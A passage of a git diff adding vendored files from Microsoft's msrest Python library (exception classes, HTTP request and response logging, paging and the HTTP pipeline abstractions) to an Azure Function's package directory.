""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +import sys + +from typing import Callable, Any, Optional, TYPE_CHECKING +from azure.core.exceptions import SerializationError, DeserializationError + +_LOGGER = logging.getLogger(__name__) + + +def raise_with_traceback(exception, message="", *args, **kwargs): + # type: (Callable, str, Any, Any) -> None + """Raise exception with a specified traceback. + + This MUST be called inside a "except" clause. + + :param Exception exception: Error type to be raised. + :param str message: Message to include with error, empty by default. + :param args: Any additional args to be included with exception. + """ + exc_type, exc_value, exc_traceback = sys.exc_info() + # If not called inside a "except", exc_type will be None. Assume it will not happen + exc_msg = "{}, {}: {}".format(message, exc_type.__name__, exc_value) # type: ignore + error = exception(exc_msg, *args, **kwargs) + try: + raise error.with_traceback(exc_traceback) + except AttributeError: + error.__traceback__ = exc_traceback + raise error + + +class ClientException(Exception): + """Base exception for all Client Runtime exceptions. + + :param str message: Description of exception. + :param Exception inner_exception: Nested exception (optional). + """ + + def __init__(self, message, inner_exception=None, *args, **kwargs): + # type: (str, Any, str, str) -> None + self.inner_exception = inner_exception + _LOGGER.debug(message) + super(ClientException, self).__init__(message, *args, **kwargs) # type: ignore + + +class TokenExpiredError(ClientException): + """OAuth token expired, request failed.""" + pass + + +class ValidationError(ClientException): + """Request parameter validation failed. + + :param str rule: Validation rule. + :param str target: Target value for the rule. + :param str value: Value that was invalid. + """ + + _messages = { + "min_length": "must have length greater than {!r}.", + "max_length": "must have length less than {!r}.", + "minimum_ex": "must be greater than {!r}.", + "maximum_ex": "must be less than {!r}.", + "minimum": "must be equal to or greater than {!r}.", + "maximum": "must be equal to or less than {!r}.", + "min_items": "must contain at least {!r} items.", + "max_items": "must contain at most {!r} items.", + "pattern": "must conform to the following pattern: {!r}.", + "unique": "must contain only unique items.", + "multiple": "must be a multiple of {!r}.", + "required": "can not be None.", + "type": "must be of type {!r}" + } + + @staticmethod + def _format_message(rule, reason, value): + if rule == "type" and value.startswith(r"{"): + internal_type = value.strip(r"{}") + value = "dict[str, {}]".format(internal_type) + return reason.format(value) + + def __init__(self, rule, target, value, *args, **kwargs): + # type: (str, str, str, str, str) -> None + self.rule = rule + self.target = target + message = "Parameter {!r} ".format(target) + reason = self._messages.get( + rule, "failed to meet validation requirement.") + message += self._format_message(rule, reason, value) + super(ValidationError, self).__init__(message, *args, **kwargs) + + +class ClientRequestError(ClientException): + """Client request failed.""" + pass + + +class AuthenticationError(ClientException): + """Client request failed to authenticate.""" + pass + + +# Needed only here for type checking +if TYPE_CHECKING: + import requests + from .serialization import Deserializer + +class HttpOperationError(ClientException): + """Client request failed due to server-specified HTTP operation error. + Attempts to deserialize response into specific error object. + + :param Deserializer deserialize: Deserializer with data on custom + error objects. + :param requests.Response response: Server response + :param str resp_type: Objects type to deserialize response. + :param args: Additional args to pass to exception object. + :ivar Model error: Deserialized error model. + """ + _DEFAULT_MESSAGE = "Unknown error" + + def __str__(self): + # type: () -> str + return str(self.message) + + def __init__(self, deserialize, response, + resp_type=None, *args, **kwargs): + # type: (Deserializer, Any, Optional[str], str, str) -> None + self.error = None + self.message = self._DEFAULT_MESSAGE + if hasattr(response, 'internal_response'): + self.response = response.internal_response + else: + self.response = response + try: + if resp_type: + self.error = deserialize(resp_type, response) + if self.error is None: + self.error = deserialize.dependencies[resp_type]() + # ARM uses OData v4, try that by default + # http://docs.oasis-open.org/odata/odata-json-format/v4.0/os/odata-json-format-v4.0-os.html#_Toc372793091 + # Code and Message are REQUIRED + try: + self.message = "({}) {}".format( + self.error.error.code, + self.error.error.message + ) + except AttributeError: + # Try the default for Autorest if not available (compat) + if self.error.message: + self.message = self.error.message + except (DeserializationError, AttributeError, KeyError): + pass + + if not self.error or self.message == self._DEFAULT_MESSAGE: + try: + response.raise_for_status() + # Two possible raises here: + # - Attribute error if response is not ClientResponse. Do not catch. + # - Any internal exception, take it. + except AttributeError: + raise + except Exception as err: # pylint: disable=broad-except + if not self.error: + self.error = err + + if self.message == self._DEFAULT_MESSAGE: + msg = "Operation returned an invalid status code {!r}" + self.message = msg.format(response.reason) + else: + if not self.error: + self.error = response + + # We can't type hint, but at least we can check that + assert self.message is not None + + super(HttpOperationError, self).__init__( + self.message, self.error, *args, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/http_logger.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/http_logger.py new file mode 100644 index 0000000..f025664 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/http_logger.py @@ -0,0 +1,105 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- + +import logging +import re +import types + +from typing import Any, Optional, TYPE_CHECKING # pylint: disable=unused-import + +if TYPE_CHECKING: + from .universal_http import ClientRequest, ClientResponse # pylint: disable=unused-import + +_LOGGER = logging.getLogger(__name__) + + +def log_request(_, request, *_args, **_kwargs): + # type: (Any, ClientRequest, str, str) -> None + """Log a client request. + + :param _: Unused in current version (will be None) + :param requests.Request request: The request object. + """ + if not _LOGGER.isEnabledFor(logging.DEBUG): + return + + try: + _LOGGER.debug("Request URL: %r", request.url) + _LOGGER.debug("Request method: %r", request.method) + _LOGGER.debug("Request headers:") + for header, value in request.headers.items(): + if header.lower() == 'authorization': + value = '*****' + _LOGGER.debug(" %r: %r", header, value) + _LOGGER.debug("Request body:") + + # We don't want to log the binary data of a file upload. + if isinstance(request.body, types.GeneratorType): + _LOGGER.debug("File upload") + else: + _LOGGER.debug(str(request.body)) + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log request: %r", err) + + +def log_response(_, _request, response, *_args, **kwargs): + # type: (Any, ClientRequest, ClientResponse, str, Any) -> Optional[ClientResponse] + """Log a server response. + + :param _: Unused in current version (will be None) + :param requests.Request request: The request object. + :param requests.Response response: The response object. + """ + if not _LOGGER.isEnabledFor(logging.DEBUG): + return None + + try: + _LOGGER.debug("Response status: %r", response.status_code) + _LOGGER.debug("Response headers:") + for res_header, value in response.headers.items(): + _LOGGER.debug(" %r: %r", res_header, value) + + # We don't want to log binary data if the response is a file. + _LOGGER.debug("Response content:") + pattern = re.compile(r'attachment; ?filename=["\w.]+', re.IGNORECASE) + header = response.headers.get('content-disposition') + + if header and pattern.match(header): + filename = header.partition('=')[2] + _LOGGER.debug("File attachments: %s", filename) + elif response.headers.get("content-type", "").endswith("octet-stream"): + _LOGGER.debug("Body contains binary data.") + elif response.headers.get("content-type", "").startswith("image"): + _LOGGER.debug("Body contains image data.") + else: + if kwargs.get('stream', False): + _LOGGER.debug("Body is streamable") + else: + _LOGGER.debug(response.text()) + return response + except Exception as err: # pylint: disable=broad-except + _LOGGER.debug("Failed to log response: %s", repr(err)) + return response diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/paging.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/paging.py new file mode 100644 index 0000000..44f60f8 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/paging.py @@ -0,0 +1,146 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import sys +try: + from collections.abc import Iterator + xrange = range +except ImportError: + from collections import Iterator + +from typing import Dict, Any, List, Callable, Optional, TYPE_CHECKING # pylint: disable=unused-import + +from .serialization import Deserializer +from .pipeline import ClientRawResponse + +if TYPE_CHECKING: + from .universal_http import ClientResponse # pylint: disable=unused-import + from .serialization import Model # pylint: disable=unused-import + +if sys.version_info >= (3, 5, 2): + # Not executed on old Python, no syntax error + from .async_paging import AsyncPagedMixin # type: ignore +else: + class AsyncPagedMixin(object): # type: ignore + pass + +class Paged(AsyncPagedMixin, Iterator): + """A container for paged REST responses. + + :param ClientResponse response: server response object. + :param callable command: Function to retrieve the next page of items. + :param dict classes: A dictionary of class dependencies for + deserialization. + :param dict raw_headers: A dict of raw headers to add if "raw" is called + """ + _validation = {} # type: Dict[str, Dict[str, Any]] + _attribute_map = {} # type: Dict[str, Dict[str, Any]] + + def __init__(self, command, classes, raw_headers=None, **kwargs): + # type: (Callable[[str], ClientResponse], Dict[str, Model], Dict[str, str], Any) -> None + super(Paged, self).__init__(**kwargs) # type: ignore + # Sets next_link, current_page, and _current_page_iter_index. + self.next_link = "" + self._current_page_iter_index = 0 + self.reset() + self._derserializer = Deserializer(classes) + self._get_next = command + self._response = None # type: Optional[ClientResponse] + self._raw_headers = raw_headers + + def __iter__(self): + """Return 'self'.""" + # Since iteration mutates this object, consider it an iterator in-and-of + # itself. + return self + + @classmethod + def _get_subtype_map(cls): + """Required for parity to Model object for deserialization.""" + return {} + + @property + def raw(self): + # type: () -> ClientRawResponse + """Get current page as ClientRawResponse. + + :rtype: ClientRawResponse + """ + raw = ClientRawResponse(self.current_page, self._response) + if self._raw_headers: + raw.add_headers(self._raw_headers) + return raw + + def get(self, url): + # type: (str) -> List[Model] + """Get an arbitrary page. + + This resets the iterator and then fully consumes it to return the + specific page **only**. + + :param str url: URL to arbitrary page results. + """ + self.reset() + self.next_link = url + return self.advance_page() + + def reset(self): + # type: () -> None + """Reset iterator to first page.""" + self.next_link = "" + self.current_page = [] # type: List[Model] + self._current_page_iter_index = 0 + + def advance_page(self): + # type: () -> List[Model] + """Force moving the cursor to the next azure call. + + This method is for advanced usage, iterator protocol is preferred. + + :raises: StopIteration if no further page + :return: The current page list + :rtype: list + """ + if self.next_link is None: + raise StopIteration("End of paging") + self._current_page_iter_index = 0 + self._response = self._get_next(self.next_link) + self._derserializer(self, self._response) + return self.current_page + + def __next__(self): + """Iterate through responses.""" + # Storing the list iterator might work out better, but there's no + # guarantee that some code won't replace the list entirely with a copy, + # invalidating an list iterator that might be saved between iterations. + if self.current_page and self._current_page_iter_index < len(self.current_page): + response = self.current_page[self._current_page_iter_index] + self._current_page_iter_index += 1 + return response + else: + self.advance_page() + return self.__next__() + + next = __next__ # Python 2 compatibility. diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__init__.py new file mode 100644 index 0000000..838a2d1 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__init__.py @@ -0,0 +1,329 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from __future__ import absolute_import # we have a "requests" module that conflicts with "requests" on Py2.7 +import abc +try: + import configparser + from configparser import NoOptionError +except ImportError: + import ConfigParser as configparser # type: ignore + from ConfigParser import NoOptionError # type: ignore +import json +import logging +import os.path +try: + from urlparse import urlparse +except ImportError: + from urllib.parse import urlparse +import xml.etree.ElementTree as ET + +from typing import TYPE_CHECKING, Generic, TypeVar, cast, IO, List, Union, Any, Mapping, Dict, Optional, Tuple, Callable, Iterator # pylint: disable=unused-import + +HTTPResponseType = TypeVar("HTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +# This file is NOT using any "requests" HTTP implementation +# However, the CaseInsensitiveDict is handy. +# If one day we reach the point where "requests" can be skip totally, +# might provide our own implementation +from requests.structures import CaseInsensitiveDict + + +_LOGGER = logging.getLogger(__name__) + +try: + ABC = abc.ABC +except AttributeError: # Python 2.7, abc exists, but not ABC + ABC = abc.ABCMeta('ABC', (object,), {'__slots__': ()}) # type: ignore + +try: + from contextlib import AbstractContextManager # type: ignore +except ImportError: # Python <= 3.5 + class AbstractContextManager(object): # type: ignore + def __enter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + def __exit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + +class HTTPPolicy(ABC, Generic[HTTPRequestType, HTTPResponseType]): + """An http policy ABC. + """ + def __init__(self): + self.next = None + + @abc.abstractmethod + def send(self, request, **kwargs): + # type: (Request[HTTPRequestType], Any) -> Response[HTTPRequestType, HTTPResponseType] + """Mutate the request. + + Context content is dependent of the HTTPSender. + """ + pass + +class SansIOHTTPPolicy(Generic[HTTPRequestType, HTTPResponseType]): + """Represents a sans I/O policy. + + This policy can act before the I/O, and after the I/O. + Use this policy if the actual I/O in the middle is an implementation + detail. + + Context is not available, since it's implementation dependent. + if a policy needs a context of the Sender, it can't be universal. + + Example: setting a UserAgent does not need to be tight to + sync or async implementation or specific HTTP lib + """ + def on_request(self, request, **kwargs): + # type: (Request[HTTPRequestType], Any) -> None + """Is executed before sending the request to next policy. + """ + pass + + def on_response(self, request, response, **kwargs): + # type: (Request[HTTPRequestType], Response[HTTPRequestType, HTTPResponseType], Any) -> None + """Is executed after the request comes back from the policy. + """ + pass + + def on_exception(self, request, **kwargs): + # type: (Request[HTTPRequestType], Any) -> bool + """Is executed if an exception comes back from the following + policy. + + Return True if the exception has been handled and should not + be forwarded to the caller. + + This method is executed inside the exception handler. + To get the exception, raise and catch it: + + try: + raise + except MyError: + do_something() + + or use + + exc_type, exc_value, exc_traceback = sys.exc_info() + """ + return False + +class _SansIOHTTPPolicyRunner(HTTPPolicy, Generic[HTTPRequestType, HTTPResponseType]): + """Sync implementation of the SansIO policy. + """ + + def __init__(self, policy): + # type: (SansIOHTTPPolicy) -> None + super(_SansIOHTTPPolicyRunner, self).__init__() + self._policy = policy + + def send(self, request, **kwargs): + # type: (Request[HTTPRequestType], Any) -> Response[HTTPRequestType, HTTPResponseType] + self._policy.on_request(request, **kwargs) + try: + response = self.next.send(request, **kwargs) + except Exception: + if not self._policy.on_exception(request, **kwargs): + raise + else: + self._policy.on_response(request, response, **kwargs) + return response + +class Pipeline(AbstractContextManager, Generic[HTTPRequestType, HTTPResponseType]): + """A pipeline implementation. + + This is implemented as a context manager, that will activate the context + of the HTTP sender. + """ + + def __init__(self, policies=None, sender=None): + # type: (List[Union[HTTPPolicy, SansIOHTTPPolicy]], HTTPSender) -> None + self._impl_policies = [] # type: List[HTTPPolicy] + if not sender: + # Import default only if nothing is provided + from .requests import PipelineRequestsHTTPSender + self._sender = cast(HTTPSender, PipelineRequestsHTTPSender()) + else: + self._sender = sender + for policy in (policies or []): + if isinstance(policy, SansIOHTTPPolicy): + self._impl_policies.append(_SansIOHTTPPolicyRunner(policy)) + else: + self._impl_policies.append(policy) + for index in range(len(self._impl_policies)-1): + self._impl_policies[index].next = self._impl_policies[index+1] + if self._impl_policies: + self._impl_policies[-1].next = self._sender + + def __enter__(self): + # type: () -> Pipeline + self._sender.__enter__() + return self + + def __exit__(self, *exc_details): # pylint: disable=arguments-differ + self._sender.__exit__(*exc_details) + + def run(self, request, **kwargs): + # type: (HTTPRequestType, Any) -> Response + context = self._sender.build_context() + pipeline_request = Request(request, context) # type: Request[HTTPRequestType] + first_node = self._impl_policies[0] if self._impl_policies else self._sender + return first_node.send(pipeline_request, **kwargs) # type: ignore + +class HTTPSender(AbstractContextManager, ABC, Generic[HTTPRequestType, HTTPResponseType]): + """An http sender ABC. + """ + + @abc.abstractmethod + def send(self, request, **config): + # type: (Request[HTTPRequestType], Any) -> Response[HTTPRequestType, HTTPResponseType] + """Send the request using this HTTP sender. + """ + pass + + def build_context(self): + # type: () -> Any + """Allow the sender to build a context that will be passed + across the pipeline with the request. + + Return type has no constraints. Implementation is not + required and None by default. + """ + return None + + +class Request(Generic[HTTPRequestType]): + """Represents a HTTP request in a Pipeline. + + URL can be given without query parameters, to be added later using "format_parameters". + + Instance can be created without data, to be added later using "add_content" + + Instance can be created without files, to be added later using "add_formdata" + + :param str method: HTTP method (GET, HEAD, etc.) + :param str url: At least complete scheme/host/path + :param dict[str,str] headers: HTTP headers + :param files: Files list. + :param data: Body to be sent. + :type data: bytes or str. + """ + def __init__(self, http_request, context=None): + # type: (HTTPRequestType, Optional[Any]) -> None + self.http_request = http_request + self.context = context + + +class Response(Generic[HTTPRequestType, HTTPResponseType]): + """A pipeline response object. + + The Response interface exposes an HTTP response object as it returns through the pipeline of Policy objects. + This ensures that Policy objects have access to the HTTP response. + + This also have a "context" dictionary where policy can put additional fields. + Policy SHOULD update the "context" dictionary with additional post-processed field if they create them. + However, nothing prevents a policy to actually sub-class this class a return it instead of the initial instance. + """ + def __init__(self, request, http_response, context=None): + # type: (Request[HTTPRequestType], HTTPResponseType, Optional[Dict[str, Any]]) -> None + self.request = request + self.http_response = http_response + self.context = context or {} + + +# ClientRawResponse is in Pipeline for compat, but technically there is nothing Pipeline here, this is deserialization + +if TYPE_CHECKING: + from ..universal_http import ClientResponse + +class ClientRawResponse(object): + """Wrapper for response object. + This allows for additional data to be gathereded from the response, + for example deserialized headers. + It also allows the raw response object to be passed back to the user. + + :param output: Deserialized response object. This is the type that would have been returned + directly by the main operation without raw=True. + :param response: Raw response object (by default requests.Response instance) + :type response: ~requests.Response + """ + + def __init__(self, output, response): + # type: (Union[Any], Optional[Union[Response, ClientResponse]]) -> None + from ..serialization import Deserializer + + if isinstance(response, Response): + # If pipeline response, remove that layer + response = response.http_response + + try: + # If universal driver, remove that layer + self.response = response.internal_response # type: ignore + except AttributeError: + self.response = response + + self.output = output + self.headers = {} # type: Dict[str, Optional[Any]] + self._deserialize = Deserializer() + + def add_headers(self, header_dict): + # type: (Dict[str, str]) -> None + """Deserialize a specific header. + + :param dict header_dict: A dictionary containing the name of the + header and the type to deserialize to. + """ + if not self.response: + return + for name, data_type in header_dict.items(): + value = self.response.headers.get(name) + value = self._deserialize(data_type, value) + self.headers[name] = value + + + +__all__ = [ + 'Request', + 'Response', + 'Pipeline', + 'HTTPPolicy', + 'SansIOHTTPPolicy', + 'HTTPSender', + # backward compat + 'ClientRawResponse', +] + +try: + from .async_abc import AsyncPipeline, AsyncHTTPPolicy, AsyncHTTPSender # pylint: disable=unused-import + from .async_abc import __all__ as _async_all + __all__ += _async_all +except SyntaxError: # Python 2 + pass +except ImportError: # pyinstaller won't include Py3 files in Py2.7 mode + pass diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..b1aaee4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/aiohttp.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/aiohttp.cpython-39.pyc new file mode 100644 index 0000000..a12ff81 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/aiohttp.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_abc.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_abc.cpython-39.pyc new file mode 100644 index 0000000..c714bba Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_abc.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_requests.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_requests.cpython-39.pyc new file mode 100644 index 0000000..c756e8a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/async_requests.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/requests.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/requests.cpython-39.pyc new file mode 100644 index 0000000..19e2ec5 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/requests.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/universal.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/universal.cpython-39.pyc new file mode 100644 index 0000000..cc636ca Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/__pycache__/universal.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/aiohttp.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/aiohttp.py new file mode 100644 index 0000000..fd1a497 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/aiohttp.py @@ -0,0 +1,62 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +from typing import Any, Optional + +from ..universal_http.aiohttp import AioHTTPSender as _AioHTTPSenderDriver +from . import AsyncHTTPSender, Request, Response + +# Matching requests, because why not? +CONTENT_CHUNK_SIZE = 10 * 1024 + +class AioHTTPSender(AsyncHTTPSender): + """AioHttp HTTP sender implementation. + """ + + def __init__(self, driver: Optional[_AioHTTPSenderDriver] = None, *, loop=None) -> None: + self.driver = driver or _AioHTTPSenderDriver(loop=loop) + + async def __aenter__(self): + await self.driver.__aenter__() + + async def __aexit__(self, *exc_details): # pylint: disable=arguments-differ + await self.driver.__aexit__(*exc_details) + + def build_context(self) -> Any: + """Allow the sender to build a context that will be passed + across the pipeline with the request. + + Return type has no constraints. Implementation is not + required and None by default. + """ + return None + + async def send(self, request: Request, **config: Any) -> Response: + """Send the request using this HTTP sender. + """ + return Response( + request, + await self.driver.send(request.http_request) + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_abc.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_abc.py new file mode 100644 index 0000000..9be0a9e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/msrest/pipeline/async_abc.py @@ -0,0 +1,165 @@ +# -------------------------------------------------------------------------- +# +# Copyright (c) Microsoft Corporation. All rights reserved. +# +# The MIT License (MIT) +# +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the ""Software""), to +# deal in the Software without restriction, including without limitation the +# rights to use, copy, modify, merge, publish, distribute, sublicense, and/or +# sell copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: +# +# The above copyright notice and this permission notice shall be included in +# all copies or substantial portions of the Software. +# +# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING +# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS +# IN THE SOFTWARE. +# +# -------------------------------------------------------------------------- +import abc + +from typing import Any, List, Union, Callable, AsyncIterator, Optional, Generic, TypeVar + +from . import Request, Response, Pipeline, SansIOHTTPPolicy + + +AsyncHTTPResponseType = TypeVar("AsyncHTTPResponseType") +HTTPRequestType = TypeVar("HTTPRequestType") + +try: + from contextlib import AbstractAsyncContextManager # type: ignore +except ImportError: # Python <= 3.7 + class AbstractAsyncContextManager(object): # type: ignore + async def __aenter__(self): + """Return `self` upon entering the runtime context.""" + return self + + @abc.abstractmethod + async def __aexit__(self, exc_type, exc_value, traceback): + """Raise any exception triggered within the runtime context.""" + return None + + + + +class AsyncHTTPPolicy(abc.ABC, Generic[HTTPRequestType, AsyncHTTPResponseType]): + """An http policy ABC. + """ + def __init__(self) -> None: + # next will be set once in the pipeline + self.next = None # type: Optional[Union[AsyncHTTPPolicy[HTTPRequestType, AsyncHTTPResponseType], AsyncHTTPSender[HTTPRequestType, AsyncHTTPResponseType]]] + + @abc.abstractmethod + async def send(self, request: Request, **kwargs: Any) -> Response[HTTPRequestType, AsyncHTTPResponseType]: + """Mutate the request. + + Context content is dependent of the HTTPSender. + """ + pass + + +class 